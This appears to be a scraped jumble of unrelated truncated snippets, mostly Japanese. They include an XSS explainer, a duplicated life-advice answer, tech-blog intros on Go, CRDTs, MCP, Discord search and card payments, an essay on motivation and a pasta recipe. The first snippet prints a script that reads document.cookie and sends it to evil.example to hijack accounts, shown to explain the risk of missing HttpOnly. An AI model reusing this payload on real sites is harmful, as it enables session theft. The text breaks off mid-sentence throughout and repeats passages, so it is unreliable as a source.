問題1: 他ユーザーの認証情報にアクセスできてしまう 投稿されたコードを普通にサイト内に埋め込むとXSSがやり放題な状態になります。 認証CookieのHttpOnlyが無効になっている場合 ユーザーがたくさん集まる超面白いゲームを作り、その中に以下のようなコードをしれっと含めると、そのゲームを開いたユーザーのアカウントの乗っ取りが可能になります。 <script> // 1. Cookieを取得 const stolen = document.cookie; // 2. 攻撃者のサーバーに送信 const img = new Image(); img.src = "https://evil.example/steal?cookie=" + encodeURIComponent(stolen); </script> CookieのHttpOnly属性が無効になっていると、スクリプトからCo

回答 (67件中の1件目) 人生がつまらないのは、あなた様が他人軸の視点に浸かっているからである可能性が高いです。 つまり「人生が楽しい人」は現実に沢山いるわけであって、幸いなことに「人生」というものの本質が「つまらない」というわけではありません。言うまでもないことでしょうけど。 しかも、その「楽しい人」の中には、あなた様の生活レベルよりも低い方も多数いるでしょう。 例えば子供は、社会的な能力は未熟ですし、経済力も皆無ですが、楽しく生きていますね。 赤ん坊も同じです。 もちろん大人の中で、無能で貧乏でも楽しく生きてる人は山のようにいますよ。 しかしある種の大人は彼らより、よほど能力的...

回答 (67件中の1件目) 人生がつまらないのは、あなた様が他人軸の視点に浸かっているからである可能性が高いです。 つまり「人生が楽しい人」は現実に沢山いるわけであって、幸いなことに「人生」というものの本質が「つまらない」というわけではありません。言うまでもないことでしょうけど。 しかも、その「楽しい人」の中には、あなた様の生活レベルよりも低い方も多数いるでしょう。 例えば子供は、社会的な能力は未熟ですし、経済力も皆無ですが、楽しく生きていますね。 赤ん坊も同じです。 もちろん大人の中で、無能で貧乏でも楽しく生きてる人は山のようにいますよ。 しかしある種の大人は彼らより、よほど能力的...

メルカリでデータ整備をしている @na0 です。最近はデータ分析 AI エージェント Socrates を開発しています。 私たち BI Product チームでは、Socrates 以前から人間が使いやすいデータインタフェースとして Basic Tables の開発を進めてきました。今では人間、AI エージェント両者にとって、Basic Tables は分析の初動を支える重要なインタフェースになっています。本稿では、この Basic Tables について説明します。 はじめにメルカリでは日々膨大なデータが蓄積され、事業成長を加速させるための重要な資産となっています。このデータを最大限に活用するため、私たち BI Product チームは 2023 年から「Basic Tables」と呼ばれる、分析の利便性を高めるテーブル群の構築に取り組んできました。 本記事では、Basic Table

はじめに こんにちは！ABEMA の広告配信システムの開発チームのバックエンドエンジニアの戸田朋花です。 本記事では、CRDT（Conflict-free Replicated Data Type）の基本概念を学びながら、その一種である GCounter を Go 言語で実装してみます。 分散システムにおいて「書き込みのスケール」や、「結果整合性の担保」といった課題に対して、CRDT がどのような解決策を提供してくれるのかを、実装とベンチマークを通じて探っていきます。 分散システムにおけるデータ管理の課題 強い一貫性のあるデータベースは、Leader/Follower 構成のアーキテクチャが代表的です。 このアーキテクチャでは、書き込みは単一の Leader ノードのみに許可されており、Follower ノードは基本的に Read 専用となります。 読み込みのスケーラビリティは Follo

↑ ↓ Go Scheduler Introduction Compilation and Go Runtime Primitive Scheduler Scheduler Enhancement GMP Model Program Bootstrap Creating a Goroutine Schedule Loop Finding a Runnable Goroutine Goroutine Preemption Handling System Calls Network I/O and File I/O How netpoll Works Garbage Collector Common Functions Go Runtime APIs Disclaimer This blog post primarily focuses on Go 1.24 programming langu

ここ1~2ヶ月でMCPについての解説がたくさん出ているしMCPが何かの説明はいらないと思うので割愛。全く何かわからない人はやさしいMCP入門を読むと良い。 こういったMCPは何か？についての記事/スライドやどのように活用するのか？の実用的な解説&紹介はすでにたくさん出ている。一方でMCPの内部について学ぼうと思った時に時にどうすればいいかというと公式のSpecificationを読むことになるはず。 ただこの入門的な解説とSpecificationの間には少しギャップがある。自分のような理解力に乏しい人間にはいきなり仕様だけ読んで「はい理解しました」とはなれない。 そこで今回はMCPのHost/Client/Serverをスクラッチで実装することを通じて、その入門とSpecificationの間を埋められると良いなと思い実装してみた。実装する言語にはRubyを使用した。 全体像 実装するの

昔DeNAの新人が入社後半年だかの振り返りのプレゼンの中で「うまくモチベーションが上がらなくて」ということを言った時に、南場社長が「社会人がモチベーションで仕事をするな」とすごく怒ったという話*1があって、とても印象に残っている。 また、これは実体験だが、その当時所属していた会社のけっこう中心的な人物が退職する送別会で、その人が受け持っていた客の話になった時、「あれもこれも大変なお客さんですね。私たちに引き継ぎできるものですかね」と残された側が不安をこぼすと、その人は「仕事やろ」とピシャリと言った、という場面をよく覚えている。 どちらも胸に氷を刺されたような、うすら寒い気持ちになったからだった。 私は、社会人だが、どうにも好き嫌いで仕事をしている節があった。やるべきことを淡々とこなすのではなく、やらなくてはならないことの中に何とか自分の興味が持てるようなテーマを見いだして、努力の為のエネル

You signed in with another tab or window. Reload to refresh your session. You signed out in another tab or window. Reload to refresh your session. You switched accounts on another tab or window. Reload to refresh your session. Dismiss alert

Back in 2017, we shared how we built our message search system to index billions of messages. We designed our search infrastructure to be performant, cost-effective, scalable, and easy to operate. We chose to use Elasticsearch, with Discord messages sharded over indices, the logical namespace for Elasticsearch messages, on two Elasticsearch clusters. Messages were sharded either by Discord server

はじめに長いこと決済業界でお仕事してきましたが関わるコンサルやSIer、はたまた自社の社員と会話してると意外とこの辺り理解してない人が多いことに気づきます。 ・そもそもカード会社の役割って？ ・カード決済の仕組みって？ そんなこともあり、今までの私の経験からこれだけは理解しておくべきでしょってことを書いていこうと思いました。これからカード会社や決済に関わる事業会社を目指している、または一緒に仕事しようとしている方々にとって有益な情報を提供できれば幸いです。 なお、ビジネスの話は多くのサイトで語られているので、ここではどちらかというとあまり調べても出てこないような仕組みの話を主にしていければと思ってます（怒られない範囲で）。 カード会社の役割ビジネスの話は他で、と言ったばかりですが最低限必要な前提知識くらいは書こうと思います。表題にもしていますが、すっごくわかりやすく言うとカード会社には２つ

Spreadsheets, databases, and beyond: creating a universal AI query layer In the world of AI agents, the ability to understand and analyze structured data is a game-changer. While large language models excel at understanding natural language, they struggle with quantitative analysis when data is presented as unstructured text. This is where Query Tables comes in – a powerful feature that enables ag

Ever wondered how AI agents actually work behind the scenes? This guide breaks down how agent systems are built as simple graphs - explained in the most beginner-friendly way possible! Note: This is a super-friendly, step-by-step version of the official PocketFlow Agent documentation. We've expanded all the concepts with examples and simplified explanations to make them easier to understand. Have

DeepSeek has made a lot of noise lately. Their R1 model, released in January 2025, outperformed competitors like OpenAI’s O1 at launch. But what truly set it apart was its highly efficient infrastructure—dramatically reducing costs while maintaining top-tier performance. Now, they're coming for data engineers. DeepSeek released a bunch of small repositories as independent code modules. Thomas Wolf

量子力学には、なぜ線形代数、つまり密度行列や状態ベクトル、そしてエルミート行列としての物理量が出てくるのかが分からないという人が結構います。しかし拙書『入門現代の量子力学』では、その行列やベクトルは単なる表記の１つに過ぎないと、強調をしています。 そもそも量子力学という理論は、物理量の確率分布を基本とした情報理論に過ぎません。波動関数や状態ベクトルも、いくつかの種類の物理量の確率分布をまとめて、１本の数式に書いたものです。この「波動関数＝確率分布」という事実から、そもそも観測問題というものも存在しなかったことが、明らかとなります。 確率分布を行列やベクトルで表示しているだけなので、行列やベクトルが出てくる理由を問う必要は、全くありません。これは電磁気学の電磁ポテンシャルや電磁場を、数学の外微分形式や四元数で書いても、そのdxや、i、j、k自体には、なにも物理的な意味がないのと同様です。 で

こんにちは！　元イタリアン料理人、現役専業主夫料理人パパイズムです。 以前僕もご紹介したことがある、目玉焼きを具材にした超シンプルなパスタ「ポヴェレッロ」。 www.hotpepper.jp 卵と粉チーズのうま味とコクで、“貧乏人のパスタ”という名前（ポヴェレッロはイタリア語で貧しいという意味なんです）が申し訳ないほど贅沢な味わいのひと皿です。 今回作るのは、そのポヴェレッロをヒントにした「ふわふわスクランブルエッグのパスタ」。目玉焼きばかりか、スクランブルエッグでも贅沢な味わいのパスタができますよ！　卵をふわふわのスクランブルエッグにするコツもご紹介します。 パパイズムの「ふわふわスクランブルエッグのパスタ」 【材料】（1人分） スパゲッティ（1.6～1.7mm）　100g 水　500ml コンソメスープの素（顆粒）　小さじ1 バター　8g 卵　2個 牛乳（水でもOK）　小さじ1 粉チー